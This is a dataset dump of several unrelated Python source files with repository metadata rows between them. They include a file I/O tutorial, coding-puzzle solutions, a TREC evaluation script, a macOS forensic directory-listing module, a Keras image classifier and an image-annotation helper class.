print(file_name, 'Cannot recognize extension')
| [
"[email protected]"
] | |
87004f51e72498ea8ff0fee7cfacb77dc1779270 | ced8d87d1fa10d577516793102851bfd1ec32cfa | /arquivos.py | 640eb9358537818068dbd56142a9a1498a6c6d09 | [] | no_license | JheniferElisabete/Python | 6538adf58144791b62bd9f73f2c9b26b475035dd | f7873623fca53424b83cc483d86cf023e10158f5 | refs/heads/main | 2023-05-26T16:51:47.920078 | 2021-06-05T03:11:13 | 2021-06-05T03:11:13 | 373,354,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | '''
dentro de um arquivo de texto com o py de maneira automatica
w -> Escrever
a -> Alterar
r -> Ler
\n -> pula linha
'''
#declara um nome para o arquivo, se existir ele vai trabalhar em cima daquele arquivo, senão ele cria um novo (dentro da pasta que o arquivo principal esta)
#cria uma variavel e usa a função reservada open, na função é necessariuos passar 2 parametros (nome, como vou abrir o arquivo)
arquivo = open('aulaPython.txt','w')
# escrevendo dentro
##arquivo.write('Oi, tudo bem com vcs?')
#é possivel criar uma variavel texto
texto = '''
Oie tudo bem com voces
sou a jhenny
'''
#passando a variavel texto
arquivo.write(texto)
# sempre que abrir arquivo fechar
arquivo.close()
#alterar
arquivo = open('aulaPython.txt','a')
texto = '''Oie tudo bem com voces
sou a jhenny
'''
arquivo.write(texto)
arquivo.close()
#Ler
arquivo = open('aulaPython.txt','r')
##texto = arquivo.read()
##print(texto)
#cria uma lista com cada linhaque ele ler
texto = arquivo.readlines()
print(texto)
#mostra linha por linha
for i in texto:
print(i)
arquivo.close()
| [
"[email protected]"
] | |
a292f0646f44750049a15d70ad355287e0aa934b | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /0301-0400/0388-Longest Absolute File Path/0388-Longest Absolute File Path.py | a86a2ef91fb97202c7e1d7bd2e4cdf25e89d83c6 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 544 | py | class Solution:
def lengthLongestPath(self, input: str) -> int:
lens = [0]
maxLen = 0
for line in input.splitlines():
name = line.lstrip('\t')
level = len(line) - len(name)
if '.' in name:
maxLen = max(maxLen, lens[level] + len(name))
else:
if level + 1 == len(lens):
lens.append(lens[-1] + 1 + len(name))
else:
lens[level + 1] = lens[level] + 1 + len(name)
return maxLen
| [
"[email protected]"
] | |
eb407744e889320793ada3b0ace22d79e6e08dcb | 4419f60ab3430b4b9f3b5cca45faeb012eff2949 | /Day18/Day18copy.py | b4aeda58ca5c2f0c8bd86f9f5043c47733e0cbf4 | [] | no_license | Bumbi54/Advent2019 | 4be5c8eb5275300911f07860c9b1460bf7b12c8a | 1a9f86b083ebee05d87b1ded3734fe16b7282a6d | refs/heads/master | 2020-09-23T01:18:12.562240 | 2020-02-20T09:09:00 | 2020-02-20T09:09:00 | 225,364,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,394 | py | import time
import operator
from collections import deque
def readInput(fileName):
"""
Read input file and parse it into a string
:param fileName: name of input file
:return: list of input file content (each line is new element)
"""
with open(fileName, 'r') as file:
fileContent = file.readlines()
return fileContent
def parseInputFile(inputList):
"""
Parse input file into coordinate system, and extract keys from it.
"""
keyDict = {}
doorDict = {}
caveSystem = {}
x = 0
y = 0
startPosition = (0, 0)
for line in inputList:
for location in line:
if location == "@":
startPosition = (x ,y)
if location != "#" and location != "\n":
if "a" <= location <= "z":
keyDict[location] = (x, y)
elif "A" <= location <= "Z":
doorDict[location] = (x, y)
caveSystem[(x, y)] = location
if location == "\n":
y = 0
x += 1
else:
y += 1
return caveSystem, keyDict, doorDict, startPosition
class Path():
def __init__(self, currentLocation, visitedLocations, visitedKeys, length ):
self.currentLocation = currentLocation
self.visitedLocations = visitedLocations
self.visitedKeys = visitedKeys
self.length = length
def collectKeys(caveSystem, keyDict, doorDict, startPosition):
"""
Find shortest path that find all of the keys in cave.
"""
queue = deque()
startPath = Path(startPosition, set([startPosition]), set(), 0)
print(startPosition)
caveSystem[startPosition] = "."
queue.append(startPath)
directions = [
(0, 1),
(1, 0),
(-1, 0),
(0, -1)
]
resultLength = [9999999999999999999999999]
cache ={}
distanceCache = {}
while queue:
currentPath = queue.pop()
keyString = list(currentPath.visitedKeys)
keyString.sort()
keyString = "".join(keyString)
#print(f"location: {currentPath.currentLocation}, keys: {currentPath.visitedKeys}, length: {currentPath.length}, visitedLocations: {currentPath.visitedLocations}")
#print(f"len:{len(queue)}")
#print(f"distanceCache:{distanceCache}")
if min(resultLength) > currentPath.length and (keyString not in cache.get(currentPath.currentLocation, []) or currentPath.length < distanceCache.get((keyString, currentPath.currentLocation), 9999999999999999)):
if currentPath.currentLocation in cache:
cache[currentPath.currentLocation].append(keyString)
else:
cache[currentPath.currentLocation] = [keyString]
distanceCache[(keyString, currentPath.currentLocation)] = currentPath.length
for direction in directions:
flag = True
newPosition = tuple(map(operator.add, direction, currentPath.currentLocation))
if newPosition not in currentPath.visitedLocations and caveSystem.get(newPosition, "#") != "#":
visitedKeys = currentPath.visitedKeys.copy()
locations = currentPath.visitedLocations.copy()
if "a" <= caveSystem.get(newPosition) <= "z":
if caveSystem.get(newPosition) not in visitedKeys:
locations = set()
visitedKeys.add(caveSystem.get(newPosition))
#print(len(visitedKeys), len(keyDict.keys()))
if len(visitedKeys) == len(keyDict.keys()):
resultLength.append(currentPath.length + 1)
print(currentPath.length + 1, min(resultLength))
flag = False
if flag and (("A" <= caveSystem.get(newPosition) <= "Z" and caveSystem.get(newPosition).lower() in visitedKeys)
or caveSystem.get(newPosition) == "@" or caveSystem.get(newPosition) == "." or
("a" <= caveSystem.get(newPosition) <= "z") ):
locations.add(newPosition)
#print(f"Addnew. newPosition: {newPosition}, direction: {direction}")
newPath = Path(newPosition, locations, visitedKeys, currentPath.length + 1)
queue.append(newPath)
return resultLength
def collectKeys2(caveSystem, keyDict, doorDict, startPosition):
"""
Find shortest path that find all of the keys in cave.
"""
queue = deque()
startPath = Path(startPosition, set([startPosition]), set(), 0)
queue.append(startPath)
directions = [
(0, 1),
(1, 0),
(-1, 0),
(0, -1)
]
resultLength = []
while queue:
currentPath = queue.pop()
for direction in directions:
flag = True
newPosition = tuple(map(operator.add, direction, currentPath.currentLocation))
print(f"currentPath.currentLocation:{currentPath.currentLocation}, newPosition: {newPosition}")
#time.sleep(1)
if newPosition not in currentPath.visitedLocations and caveSystem.get(newPosition, "#") != "#":
print("Am i here")
visitedKeys = currentPath.visitedKeys.copy()
locations = currentPath.visitedLocations.copy()
if "a" <= caveSystem.get(newPosition) <= "z":
if caveSystem.get(newPosition) not in visitedKeys:
locations = set()
visitedKeys.add(caveSystem.get(newPosition))
print(len(visitedKeys), len(keyDict.keys()))
if len(visitedKeys) == len(keyDict.keys()):
print(f"Hope: {currentPath.length + 1}")
resultLength.append(currentPath.length + 1)
flag = False
if flag and (("A" <= caveSystem.get(newPosition) <= "Z" and caveSystem.get(newPosition).lower() in visitedKeys)
or caveSystem.get(newPosition) == "@" or caveSystem.get(newPosition) == "." or
("a" <= caveSystem.get(newPosition) <= "z") and caveSystem.get(newPosition) ):
print("Adding new to queue")
locations.add(newPosition)
newPath = Path(newPosition, locations, visitedKeys, currentPath.length + 1)
queue.append(newPath)
return resultLength
if __name__ == "__main__":
inputList = readInput("input.txt")
print(f"readInput: {inputList}")
caveSystem, keyDict, doorDict, startPosition = parseInputFile(inputList)
print(f"parseInputFile, caveSystem:{caveSystem}, keyDict:{keyDict}, doorDict: {doorDict}, startPosition: {startPosition}")
resultLength = collectKeys( caveSystem, keyDict, doorDict, startPosition)
print(f"collectKeys: {resultLength}")
print(f"collectKeys: {min(resultLength)}")
| [
"[email protected]"
] | |
e19a2fdc668d2afa05c73abad92ebda28b69684e | edd28a06e0d212293c64ea0abb2190fca619eb31 | /eval.py | a2fb671d6bf999ab93fe1c4ac1de94253751dc4e | [] | no_license | sagittefrat/Information-Retrieval-competition | e64595237db9b7e64b4438bf78141bd67cc0ab3a | c1394dadb38070adc301462564e4c282232a2f24 | refs/heads/master | 2021-01-01T13:29:42.163977 | 2020-04-09T13:36:47 | 2020-04-09T13:36:47 | 239,299,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # -*- coding: utf-8 -*-
import os
import pandas as pd
import numpy as np
sample_queries=xrange(301,351)
eval_array=np.zeros(shape=(50))
res_file_old=pd.read_csv('res_file_1000', sep=' ', names=['query', 'b1','docno','b2','b3','b4'])
res_file_new=pd.read_csv('new_relevant_docs', sep=' ',names=['query', 'b1','docno','b2','b3','b4'])
def eval(file1, file2) :
for query in sample_queries:
'''file1[file1['query']==query].to_csv('temp_res', sep=' ', header=None, index=False)
os.system('../trec_eval_9.0/trec_eval qrels_50_Queries temp_res | grep all | grep map > eval_file1')
eval_f1=pd.read_csv('eval_file1', sep= '\t', header=None, names=['name','all','value'])'''
file2[file2['query']==query].to_csv('temp_res', sep=' ', header=None, index=False)
os.system('../trec_eval_9.0/trec_eval qrels_50_Queries temp_res | grep all | grep map > eval_file2')
eval_f2=pd.read_csv('eval_file2', sep= '\t', header=None, names=['name','all','value'])
#eval_array[query-301] = ( int(query), eval_f1['value'][0], eval_f2['value'][0] )
eval_array[query-301] = ( eval_f2['value'][0] )
bla=pd.DataFrame(eval_array)
bla.to_csv('temp_res', sep='\t', header=['new'], index=False)
eval(res_file_old, res_file_new) | [
"[email protected]"
] | |
07663a4e8be6728f443ba0d3c83963e1f88260a7 | addc17385b371aea8ad109349cfed34b4c6194a7 | /askisi1.py | ed28ffe7d56fc23610dbbd045f691cfb7bf89e1a | [] | no_license | GeorgeXyp01/Python-Papei | 0387d091df2e589042e426f4ded56e34d4a27ecb | b041fb86cffd0618b4daf2044823e2bf5f09ada7 | refs/heads/master | 2022-03-29T20:07:25.658035 | 2020-01-21T15:01:40 | 2020-01-21T15:01:40 | 234,324,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | f = open("file.txt", "r")
words = f.read().split()
vowels=["a", "e", "u", "o", "i", "y"]
def func(n):
return len(n)
for i in range(len(words)):
str = words[i]
list(str)
for x in str:
if x in vowels:
str = str.replace(x, "")
words[i]="".join(str)
words.sort(reverse=True, key=func)
for i in range(5):
print(words[i][::-1])
f.close()
| [
"[email protected]"
] | |
4f607029dc5f2cefac0e8a280a10a98d7d07073f | 73b56f4333de6c63244b4e4e504ae187a520cb4d | /modules/mod_dirlist_v101.py | df302123b416376a1b92939fc0d723bd9cc77c24 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sjh/automactc | d1e5cc9ac36d9de2a9eda0655af63be51a25c731 | a9726a98fdc001d2a9331311d4a1eb3de4bd5fe1 | refs/heads/master | 2020-05-26T02:00:24.004055 | 2019-05-22T15:51:24 | 2019-05-22T15:51:24 | 188,069,194 | 1 | 0 | null | 2019-05-22T15:47:09 | 2019-05-22T15:47:09 | null | UTF-8 | Python | false | false | 9,094 | py | #!/usr/bin/env python
# IMPORT FUNCTIONS FROM COMMON.FUNCTIONS
from common.functions import stats2
from common.functions import get_codesignatures
from common.functions import read_stream_bplist
from common.functions import multiglob
# IMPORT STATIC VARIABLES FROM MAIN
from __main__ import inputdir
from __main__ import outputdir
from __main__ import forensic_mode
from __main__ import no_tarball
from __main__ import quiet
from __main__ import dirlist_include_dirs
from __main__ import dirlist_exclude_dirs
from __main__ import dirlist_no_multithreading
from __main__ import hash_alg
from __main__ import hash_size_limit
from __main__ import no_code_signatures
from __main__ import recurse_bundles
from __main__ import debug
from __main__ import archive
from __main__ import startTime
from __main__ import full_prefix
from __main__ import data_writer
import os
import glob
import sys
import hashlib
import pytz
import itertools
import time
import io
import logging
import traceback
from collections import OrderedDict
from datetime import datetime
from xattr import listxattr, getxattr
from multiprocessing.dummy import Pool as ThreadPool
_modName = __name__.split('_')[-2]
_modVers = '.'.join(list(__name__.split('_')[-1][1:]))
log = logging.getLogger(_modName)
def shasum(filename, filesize, block_size=65536):
if filesize <= hash_size_limit and filesize > 0:
sha256 = hashlib.sha256()
try:
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
sha256 = sha256.hexdigest()
except IOError:
sha256 = 'ERROR'
else:
sha256 = ''
return sha256
def md5sum(filename, filesize, block_size=65536):
if filesize <= hash_size_limit and filesize > 0:
md5 = hashlib.md5()
try:
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
md5.update(block)
md5 = md5.hexdigest()
except:
md5 = 'ERROR'
else:
md5 = ''
return md5
def xattr_get(fullpath, attr_name):
try:
list_attrs = listxattr(fullpath)
if len(list_attrs) > 0 and attr_name in list_attrs:
out = getxattr(fullpath, attr_name)
return out
else:
return ''
except:
return 'ERROR'
def handle_files(name):
global counter
counter+=1
if not quiet:
if debug:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s | FileName: %s \033[K\r' % (counter,datetime.now(pytz.UTC)-startTime,name))
else:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s \r' % (counter,datetime.now(pytz.UTC)-startTime))
sys.stdout.flush()
# get timestamps and metadata for each file
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(os.path.join(root, name))
record.update(stat_data)
# get quarantine extended attribute for each file, if available
if stat_data['mode'] != "Other":
try:
quarantine = xattr_get(os.path.join(root, name),"com.apple.quarantine").split(';')[2]
except:
quarantine = xattr_get(os.path.join(root, name),"com.apple.quarantine")
record['quarantine'] = quarantine.replace('\\x20',' ')
# get wherefrom extended attribute for each file, if available
wherefrom = xattr_get(os.path.join(root, name),"com.apple.metadata:kMDItemWhereFroms")
if wherefrom != "" and wherefrom.startswith("bplist"):
record['wherefrom_1'] = wherefrom
else:
record['wherefrom_1'] = ['']
# if hash alg is specified 'none' at amtc runtime, do not hash files. else do sha256 and md5 as specified (sha256 is default at runtime, md5 is user-specified)
if "none" not in hash_alg and stat_data['mode'] == "Regular File":
if 'sha256' in hash_alg:
record['sha256'] = shasum(os.path.join(root, name),record['size'])
if 'md5' in hash_alg:
record['md5'] = md5sum(os.path.join(root, name),record['size'])
# output.write_entry(record.values())
return record
def filePooler(files):
file_data = filePool.map(handle_files, files)
return file_data
headers = ['mode','size','uid','gid','mtime','atime','ctime','btime','path','name','sha256','md5','quarantine','wherefrom_1','wherefrom_2','code_signatures']
output = data_writer(_modName, headers)
# if there are specific directories to recurse, recurse them.
if dirlist_include_dirs != ['']:
root_list = []
for i in dirlist_include_dirs:
root_list.append(os.path.join(inputdir, i))
root_list = list(itertools.chain.from_iterable([glob.glob(i) for i in root_list]))
# if there are no specific directories to recurse, recurse from the root of the inputdir. also write the stats data to
else:
root_list = glob.glob(inputdir)
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(inputdir)
record.update(stat_data)
output.write_entry(record.values())
# by default (if no-defaults is NOT in exclusion flag) exclude the following directories
if 'no-defaults' not in dirlist_exclude_dirs:
if not forensic_mode:
default_exclude = [
'.fseventsd','.DocumentRevisions-V100','.Spotlight-V100',
'Users/*/Pictures', 'Users/*/Library/Application Support/AddressBook',
'Users/*/Calendar', 'Users/*/Library/Calendars',
'Users/*/Library/Preferences/com.apple.AddressBook.plist'
]
else:
default_exclude = ['.fseventsd','.DocumentRevisions-V100','.Spotlight-V100']
# if no-defaults is in the exclusion flag, remove no-defaults and use the user-provided exclusion list
else:
default_exclude = []
dirlist_exclude_dirs.remove('no-defaults')
# if there are specific directories to exclude, do not recurse them
if dirlist_exclude_dirs != ['']:
exclude_list = [os.path.join(inputdir, i).strip("/") for i in default_exclude + dirlist_exclude_dirs]
# if no specific directories are excluded, use default-list (created above)
else:
exclude_list = [os.path.join(inputdir, i).strip("/") for i in default_exclude]
# if NOT running with -f flag for forensic mode, exclude everything in /Volumes/* to prevent recursion of mounted volumes IN ADDITION to other exclusions.
if not forensic_mode:
exclude_list += [i for i in glob.glob(os.path.join(inputdir, 'Volumes/*'))]
exclude_list = multiglob(inputdir, exclude_list)
else:
exclude_list = multiglob('/', exclude_list)
log.debug("The following directories will be excluded from dirlist enumeration: {0}".format(exclude_list))
# determine which hashing algorithms to run
if type(hash_alg) is list:
hash_alg = [''.join([x.lower() for x in i]) for i in hash_alg]
elif type(hash_alg) is str:
hash_alg = [hash_alg]
counter=0
filePool = ThreadPool(4)
for i in root_list:
for root, dirs, files in os.walk(i, topdown=True):
# prune excluded directories and files to prevent further recursion into them
dirs[:] = [d for d in dirs if os.path.join(root,d) not in exclude_list]
files[:] = [f for f in files if os.path.join(root,f) not in exclude_list]
# do not recurse into bundles that end with any of the file extensions below UNLESS told to at amtc runtime
exc_bundles = ('.app', '.framework','.lproj','.plugin','.kext','.osax','.bundle','.driver','.wdgt')
if root.strip().endswith(exc_bundles) and not (os.path.basename(root)).startswith('.') and recurse_bundles == False:
dirs[:] = []
files[:] = []
if dirlist_no_multithreading:
file_data = [handle_files(file) for file in files]
else:
file_data = filePooler(files)
for record in file_data:
wf = record['wherefrom_1']
if wf != ['']:
try:
parsed_wf = read_stream_bplist(wf)
parsed_wf_utf8 = [str(a.encode('utf-8')) for a in parsed_wf if a != ""]
except:
pathname = os.path.join(record['path'],record['name'])
parsed_wf_utf8 = ['ERROR']
log.debug("Could not parse embedded binary plist for kMDItemWhereFroms data from file {0}. {1}".format(pathname,[traceback.format_exc()]))
if len(parsed_wf_utf8) > 0:
record['wherefrom_1'] = parsed_wf_utf8[0]
if len(parsed_wf_utf8) > 1:
record['wherefrom_2'] = parsed_wf_utf8[1]
else:
record['wherefrom_1'] = ''
else:
record['wherefrom_1'] = ''
output.write_entry(record.values())
# bundles that will be code-sig checked
check_signatures_bundles = ('.app','.kext','.osax')
for name in dirs:
counter+=1
if not quiet:
if debug:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s | FileName: %s \033[K\r' % (counter,datetime.now(pytz.UTC)-startTime,name))
else:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s \r' % (counter,datetime.now(pytz.UTC)-startTime))
sys.stdout.flush()
# get timestamps and metadata for each file
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(os.path.join(root, name))
record.update(stat_data)
# directory is bundle that ends with either of the three extensions, check its code signatures
if no_code_signatures is False and name.endswith(check_signatures_bundles) and not name.startswith('.'): #meaning DO process code signatures
record['code_signatures'] = str(get_codesignatures(os.path.join(root, name)))
output.write_entry(record.values())
filePool.close()
filePool.join()
if not quiet:
sys.stdout.write('\n')
sys.stdout.flush() | [
"[email protected]"
] | |
3d7ccbc3de07a241689ab3b9d7dea466d243fcb4 | f9b4d965b7b0065f8254b27899487fb2125691e5 | /cats_dogs_model_depth.py | 6528ae47ec552d85738dc744b9a3545a862b706f | [] | no_license | zhihanyang2022/cnn-experiments | 22bb545409fcd0933bccbe8fbfbace6cee2ec566 | 0e6b725426922cbebad98bc1a44f7c69971dc432 | refs/heads/master | 2020-04-23T05:26:06.093569 | 2019-03-10T18:24:09 | 2019-03-10T18:24:09 | 170,939,953 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # <codecell>
from keras import models
from keras import layers
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
# <codecell>
import os
original_dataset_dir_cat = '/Users/yangzhihan/Desktop/PetImages/cat'
original_dataset_dir_dog = '/Users/yangzhihan/Desktop/PetImages/dog'
base_dir = '/Users/yangzhihan/My Files/Academic Interests/Computer Science/0 Datasets/cats_and_dogs_dataset'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
test_cats_dir = os.path.join(test_dir, 'cats')
test_dogs_dir = os.path.join(test_dir, 'dogs')
# <codecell>
train_datagen = ImageDataGenerator(rescale=1./255)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(train_dir, target_size=(150, 150), batch_size=20, class_mode='binary')
validation_generator = validation_datagen.flow_from_directory(validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary')
#
#yield
#next
#support for loops
#adv: much more readable in the for loop
#generator comprehension, use()
#list() converts to list
# generator is good with performance
# <codecell>
model = models.Sequential()
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=0.0001),
metrics=['accuracy'])
model.fit_generator(train_generator, steps_per_epoch=100, epochs=30, validation_data=validation_generator, validation_steps=50)
# <codecell>
os.chdir("/Users/yangzhihan/Desktop")
model.save('cats_and_dogs_small_1.h5')
# <codecell>
os.getcwd()
# <codecell>
model = models.load_model('/Users/yangzhihan/Desktop/s`cat_and_dogs_1.h5')
#
| [
"[email protected]"
] | |
a780c71aa45f05efbbf6ac177b608b0cc54997b7 | 71d3e539e3ba8ab06d61bfb3683414a129a4d744 | /detecting_objects/image_evaluator/src/image_evaluator.py | 76b3bf77e4ab4ce278f0921170cf311b8441bb6f | [] | no_license | browlm13/Basketball-Shot-Detection | b0dfbc0de3129917697b077a59f5519a7faecc57 | 8ea4e35effdf2c6f02d2d275cd3d48d9da218608 | refs/heads/master | 2021-10-27T21:10:11.241146 | 2019-04-19T18:50:57 | 2019-04-19T18:50:57 | 105,725,060 | 83 | 16 | null | null | null | null | UTF-8 | Python | false | false | 20,400 | py | #python3
"""
Image Evaluator Class
img_eval = Image_Evaluator()
# Loading Models - Todo: store in file so only model name has to be used
BASKETBALL_MODEL = {'name' : 'basketball_model', 'paths' : {'frozen graph': PATH_TO_FROZEN_GRAPH, 'labels' : PATH_TO_LABELS}}
PERSON_MODEL = {'name' : 'person_model', 'paths' : {'frozen graph': PATH_TO_FROZEN_GRAPH, 'labels' : PATH_TO_LABELS}}
img_eval.load_models([BASKETBALL_MODEL, PERSON_MODEL])
todo: img_eval.annotate_directory(image_directory, annotations_directory) #Add selected categories and minscores
todo: cropping
"""
import numpy as np
import os
from PIL import Image
import PIL.Image as Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
import tensorflow as tf
#from utils import label_map_util
from image_evaluator.src.utils import label_map_util
import glob
import shutil
#from shutil import copyfile
#from shutil import copy
class Image_Evaluator:
def __init__(self):
self.models = []
self.categories = {}
def load_models(self, model_list):
#Todo: ensure existance
self.models = model_list
#determine categories
for m in self.models:
#get each models label dict
m['categories'] = label_map_util.get_label_map_dict( m['paths']['labels'], use_display_name=m['use_display_name'] )
#go through models, for each unique category list all models that can identify, use first as evaluation model
for m in self.models:
for key in m['categories']:
if key in self.categories:
self.categories[key]['models'].append(m['name'])
else:
self.categories[key] = {'models' : [m['name']], 'evaluation_model' : m['name']}
#set all evaluaton models used (what needs to be loaded into memory for image evaluation)
def get_evaluation_models(self):
evaluation_models = []
for c in self.categories:
if self.categories[c]['evaluation_model'] not in evaluation_models:
evaluation_models.append(self.categories[c]['evaluation_model'])
return evaluation_models
def set_category_evaluation_model(self, category_name, model_name):
self.categories[category_name]['evaluation_model'] = model_name
#path, folder, filename
def get_path_data(self, path):
folder = os.path.basename(os.path.dirname(path))
filename = os.path.basename(path)
return path, folder, filename
def get_model_path(self, model_name, file_name):
path = ""
for model in self.models:
if model['name'] == model_name:
path = model['paths'][file_name]
return path
def get_model_categories_dict(self, model_name):
for model in self.models:
if model['name'] == model_name:
return model['categories']
def get_model_evaluation_categories(self, model_name):
evaluation_categories = []
for c in self.categories:
if self.categories[c]['evaluation_model'] == model_name:
evaluation_categories.append(c)
return evaluation_categories
def load_image_into_numpy_array(self, image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)
def image_dimensions(self, image_np):
image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')
return image_pil.size
#
# Writing Image XML annotations
#
def swap_exentsion(self, full_filename, new_extension):
template = "%s.%s" # filename, extension
filename_base, old_extension = os.path.splitext(full_filename)
return template % (filename_base, new_extension.strip('.'))
def generate_new_filename(self, output_directory_path, image_info, new_extension):
new_filename = self.swap_exentsion(image_info['image_filename'], new_extension)
full_path = os.path.join(output_directory_path, new_filename)
return full_path
def generate_xml_string(self, image_info):
image_data = {}
image_data['path'] = image_info['image_path']
image_data['folder'] = image_info['image_folder']
image_data['filename'] = image_info['image_filename']
image_data['width'] = image_info['image_width']
image_data['height'] = image_info['image_height']
image_data['depth'] = 3
#unspecifeid
image_data['database'] = 'NA'
image_data['segmented'] = 0
image_data['objects'] = []
for item in image_info['image_items_list']:
o = {}
o['name'] = item['class']
xmin, xmax, ymin, ymax = item['box']
o['xmin'] = xmin
o['ymin'] = ymin
o['xmax'] = xmax
o['ymax'] = ymax
#unspecifeid
o['pose'] = 'Unspecified'
o['truncated'] = 0
o['difficult'] = 0
image_data['objects'].append(o)
# create XML
annotation_tag = ET.Element('annotation')
folder_tag = ET.SubElement(annotation_tag, 'folder')
folder_tag.text = image_data['folder']
filename_tag = ET.SubElement(annotation_tag, 'filename')
filename_tag.text = image_data['filename']
path_tag = ET.SubElement(annotation_tag, 'path')
path_tag.text = image_data['path']
source_tag = ET.SubElement(annotation_tag, 'source')
database_tag = ET.SubElement(source_tag, 'database')
database_tag.text = image_data['database']
size_tag = ET.SubElement(annotation_tag, 'size')
width_tag = ET.SubElement(size_tag, 'width')
width_tag.text = str(image_data['width'])
height_tag = ET.SubElement(size_tag, 'height')
height_tag.text = str(image_data['height'])
depth_tag = ET.SubElement(size_tag, 'depth')
depth_tag.text = str(image_data['depth'])
segmented_tag = ET.SubElement(annotation_tag, 'segmented')
segmented_tag.text = str(0)
for o in image_data['objects']:
object_tag = ET.SubElement(annotation_tag, 'object')
name_tag = ET.SubElement(object_tag, 'name')
name_tag.text = o['name']
pose_tag = ET.SubElement(object_tag, 'pose')
pose_tag.text = o['pose']
truncated_tag = ET.SubElement(object_tag, 'truncated')
truncated_tag.text = str(o['truncated'])
difficult_tag = ET.SubElement(object_tag, 'difficult')
difficult_tag.text = str(o['difficult'])
bndbox_tag = ET.SubElement(object_tag, 'bndbox')
xmin_tag = ET.SubElement(bndbox_tag, 'xmin')
xmin_tag.text = str(o['xmin'])
ymin_tag = ET.SubElement(bndbox_tag, 'ymin')
ymin_tag.text = str(o['ymin'])
xmax_tag = ET.SubElement(bndbox_tag, 'xmax')
xmax_tag.text = str(o['xmax'])
ymax_tag = ET.SubElement(bndbox_tag, 'ymax')
ymax_tag.text = str(o['ymax'])
#return ET.tostring(annotation_tag).decode('utf-8')
dom = minidom.parseString(ET.tostring(annotation_tag).decode('utf-8'))
return dom.toprettyxml(indent='\t')
def write_xml_file(self, image_info, outpath):
# if directorydoes not exist, create it
if not os.path.exists(outpath):
os.makedirs(outpath)
xml_string = self.generate_xml_string(image_info)
xml_filename = self.generate_new_filename(outpath, image_info, 'xml')
with open(xml_filename, "w") as f:
f.write(xml_string)
def filter_minimum_score_threshold(self, image_info_bundel, min_score_thresh):
filtered_image_info_bundel = {}
for image_path, image_info in image_info_bundel.items():
filtered_image_info_bundel[image_path] = image_info
filtered_image_items_list = []
for item in image_info['image_items_list']:
if item['score'] > min_score_thresh:
filtered_image_items_list.append(item)
filtered_image_info_bundel[image_path]['image_items_list'] = filtered_image_items_list
return filtered_image_info_bundel
def filter_selected_categories(self, image_info_bundel, selected_categories_list):
filtered_image_info_bundel = {}
for image_path, image_info in image_info_bundel.items():
filtered_image_info_bundel[image_path] = image_info
filtered_image_items_list = []
for item in image_info['image_items_list']:
if item['class'] in selected_categories_list:
filtered_image_items_list.append(item)
filtered_image_info_bundel[image_path]['image_items_list'] = filtered_image_items_list
return filtered_image_info_bundel
def _image_info(self, category_index, selected_categories, image_np, boxes, scores, classes, min_score_thresh=0.0001):
# retrieve image size
image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')
im_width, im_height = image_pil.size
#box, class, score
item_list = []
for i in range(boxes.shape[0]):
if scores is None or scores[i] > min_score_thresh:
item = {}
#
# box
#
normalized_box = tuple(boxes[i].tolist())
n_ymin, n_xmin, n_ymax, n_xmax = normalized_box
box = (int(n_xmin * im_width), int(n_xmax * im_width), int(n_ymin * im_height), int(n_ymax * im_height)) #(left, right, top, bottom)
item['box'] = box
#
# class name
#
class_name = 'NA'
if classes[i] in category_index.keys():
class_name = str(category_index[classes[i]]['name'])
item['class'] = class_name
#
# detection score
#
item['score'] = 100*scores[i]
# add if class is in selected_classes, to ensure only evaluation model is evalutating
if item['class'] in selected_categories:
item_list.append(item)
return item_list
def get_image_info(self, image_path_list, min_score_thresh=None, prevent_overlap=True):
image_info_bundel = dict((image_path, {'image_items_list':[], 'image_folder':'', 'image_filename':'','image_path':'', 'image_height':-1, 'image_width':-1}) for image_path in image_path_list) #key= path, value is cobined item list
# for each unique model evaluator in categories list perform detection
for model_name in self.get_evaluation_models():
